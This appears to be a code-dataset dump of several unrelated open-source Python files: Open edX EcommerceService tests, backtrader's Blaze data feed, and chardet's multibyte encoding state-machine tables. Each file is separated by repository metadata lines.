audit_log('foo', qux='quux', bar='baz')
# Verify that the logged message contains comma-separated
# key-value pairs ordered alphabetically by key.
message = 'foo: bar="baz", qux="quux"'
mock_log.info.assert_called_with(message)
class EcommerceServiceTests(TestCase):
"""Tests for the EcommerceService helper class."""
SKU = 'TESTSKU'
def setUp(self):
self.request_factory = RequestFactory()
self.user = UserFactory.create()
self.request = self.request_factory.get("foo")
update_commerce_config(enabled=True)
super(EcommerceServiceTests, self).setUp()
def test_is_enabled(self):
"""Verify that is_enabled() returns True when ecomm checkout is enabled. """
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
config = CommerceConfiguration.current()
config.checkout_on_ecommerce_service = False
config.save()
is_not_enabled = EcommerceService().is_enabled(self.user)
self.assertFalse(is_not_enabled)
@override_switch(settings.DISABLE_ACCOUNT_ACTIVATION_REQUIREMENT_SWITCH, active=True)
def test_is_enabled_activation_requirement_disabled(self):
"""Verify that is_enabled() returns True when ecomm checkout is enabled. """
self.user.is_active = False
self.user.save()
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
@patch('openedx.core.djangoapps.theming.helpers.is_request_in_themed_site')
def test_is_enabled_for_microsites(self, is_microsite):
"""Verify that is_enabled() returns True if used for a microsite."""
is_microsite.return_value = True
is_enabled = EcommerceService().is_enabled(self.user)
self.assertTrue(is_enabled)
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_ecommerce_url_root(self):
"""Verify that the proper root URL is returned."""
self.assertEqual(EcommerceService().ecommerce_url_root, 'http://ecommerce_url')
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_get_absolute_ecommerce_url(self):
"""Verify that the proper URL is returned."""
url = EcommerceService().get_absolute_ecommerce_url('/test_basket/')
self.assertEqual(url, 'http://ecommerce_url/test_basket/')
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_get_receipt_page_url(self):
"""Verify that the proper Receipt page URL is returned."""
order_number = 'ORDER1'
url = EcommerceService().get_receipt_page_url(order_number)
expected_url = 'http://ecommerce_url/checkout/receipt/?order_number={}'.format(order_number)
self.assertEqual(url, expected_url)
@override_settings(ECOMMERCE_PUBLIC_URL_ROOT='http://ecommerce_url')
def test_checkout_page_url(self):
""" Verify the checkout page URL is properly constructed and returned. """
url = EcommerceService().checkout_page_url(self.SKU)
expected_url = 'http://ecommerce_url/test_basket/?sku={}'.format(self.SKU)
self.assertEqual(url, expected_url)
|
agpl-3.0
|
YuepengGuo/backtrader
|
backtrader/feeds/blaze.py
|
2
|
2832
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from backtrader import date2num
import backtrader.feed as feed
class BlazeData(feed.DataBase):
'''
Support for `Blaze <blaze.pydata.org>`_ ``Data`` objects.
Only numeric indices to columns are supported.
Note:
- The ``dataname`` parameter is a blaze ``Data`` object
- A negative value in any of the parameters for the Data lines
indicates it's not present in the ``Data`` object
'''
params = (
# datetime must be present
('datetime', 0),
# pass -1 for any of the following to indicate absence
('open', 1),
('high', 2),
('low', 3),
('close', 4),
('volume', 5),
('openinterest', 6),
)
datafields = [
'datetime', 'open', 'high', 'low', 'close', 'volume', 'openinterest'
]
def start(self):
# reset the iterator on each start
self._rows = iter(self.p.dataname)
def _load(self):
try:
row = next(self._rows)
except StopIteration:
return False
# Set the standard datafields - except for datetime
for datafield in self.datafields[1:]:
# get the column index
colidx = getattr(self.params, datafield)
if colidx < 0:
# column not present -- skip
continue
# get the line to be set
line = getattr(self.lines, datafield)
line[0] = row[colidx]
# datetime - assumed blaze always serves a native datetime.datetime
colidx = getattr(self.params, self.datafields[0])
dt = row[colidx]
dtnum = date2num(dt)
# get the line to be set
line = getattr(self.lines, self.datafields[0])
line[0] = dtnum
# Done ... return
return True
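def _example_blaze_feed():
    """Minimal usage sketch, not part of the original module; assumes the
    ``blaze`` package and a hypothetical CSV file with columns in the
    default datetime/OHLCV positions."""
    import blaze  # deferred import, only needed for this sketch
    import backtrader as bt
    # openinterest=-1 marks that column as absent, per the params above.
    feed = BlazeData(dataname=blaze.Data('prices.csv'), openinterest=-1)
    cerebro = bt.Cerebro()
    cerebro.adddata(feed)
    return cerebro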
|
gpl-3.0
|
wkeyword/pip
|
pip/_vendor/requests/packages/chardet/mbcssm.py
|
1783
|
19590
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
# BIG5
BIG5_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
BIG5_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
Big5CharLenTable = (0, 1, 1, 2, 0)
Big5SMModel = {'classTable': BIG5_cls,
'classFactor': 5,
'stateTable': BIG5_st,
'charLenTable': Big5CharLenTable,
'name': 'Big5'}
# CP949
CP949_cls = (
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
CP949SMModel = {'classTable': CP949_cls,
'classFactor': 10,
'stateTable': CP949_st,
'charLenTable': CP949CharLenTable,
'name': 'CP949'}
# EUC-JP
EUCJP_cls = (
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5 # f8 - ff
)
EUCJP_st = (
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
EUCJPSMModel = {'classTable': EUCJP_cls,
'classFactor': 6,
'stateTable': EUCJP_st,
'charLenTable': EUCJPCharLenTable,
'name': 'EUC-JP'}
# EUC-KR
EUCKR_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0 # f8 - ff
)
EUCKR_st = (
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
EUCKRCharLenTable = (0, 1, 2, 0)
EUCKRSMModel = {'classTable': EUCKR_cls,
'classFactor': 4,
'stateTable': EUCKR_st,
'charLenTable': EUCKRCharLenTable,
'name': 'EUC-KR'}
# EUC-TW
EUCTW_cls = (
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
EUCTW_st = (
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
EUCTWSMModel = {'classTable': EUCTW_cls,
'classFactor': 7,
'stateTable': EUCTW_st,
'charLenTable': EUCTWCharLenTable,
'name': 'x-euc-tw'}
# GB2312
GB2312_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0 # f8 - ff
)
GB2312_st = (
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validating
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
GB2312SMModel = {'classTable': GB2312_cls,
'classFactor': 7,
'stateTable': GB2312_st,
'charLenTable': GB2312CharLenTable,
'name': 'GB2312'}
# Shift_JIS
SJIS_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,2,2,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages do
#contain such bytes. We need to be more forgiving of errors.
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,0,0,0) # f8 - ff
SJIS_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
SJISSMModel = {'classTable': SJIS_cls,
'classFactor': 6,
'stateTable': SJIS_st,
'charLenTable': SJISCharLenTable,
'name': 'Shift_JIS'}
# UCS2-BE
UCS2BE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2BE_st = (
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
UCS2BESMModel = {'classTable': UCS2BE_cls,
'classFactor': 6,
'stateTable': UCS2BE_st,
'charLenTable': UCS2BECharLenTable,
'name': 'UTF-16BE'}
# UCS2-LE
UCS2LE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2LE_st = (
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
UCS2LESMModel = {'classTable': UCS2LE_cls,
'classFactor': 6,
'stateTable': UCS2LE_st,
'charLenTable': UCS2LECharLenTable,
'name': 'UTF-16LE'}
# UTF-8
UTF8_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0 # f8 - ff
)
UTF8_st = (
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)
UTF8SMModel = {'classTable': UTF8_cls,
'classFactor': 16,
'stateTable': UTF8_st,
'charLenTable': UTF8CharLenTable,
'name': 'UTF-8'}
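# A minimal sketch (not part of the original module) of how these model
# dictionaries are consumed; it mirrors chardet's CodingStateMachine. Each
# input byte is mapped to a character class, and the class together with
# the current state indexes the flattened state-transition table:
def _example_next_state(model, current_state, byte_value):
    byte_class = model['classTable'][byte_value]
    return model['stateTable'][current_state * model['classFactor'] + byte_class]
# For example, feeding byte 0xE3 to UTF8SMModel from eStart selects class 8
# (lead byte of a three-byte sequence) and advances the machine to state 9,
# which then expects two continuation bytes.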
|
mit
|
SummerLW/Perf-Insight-Report
|
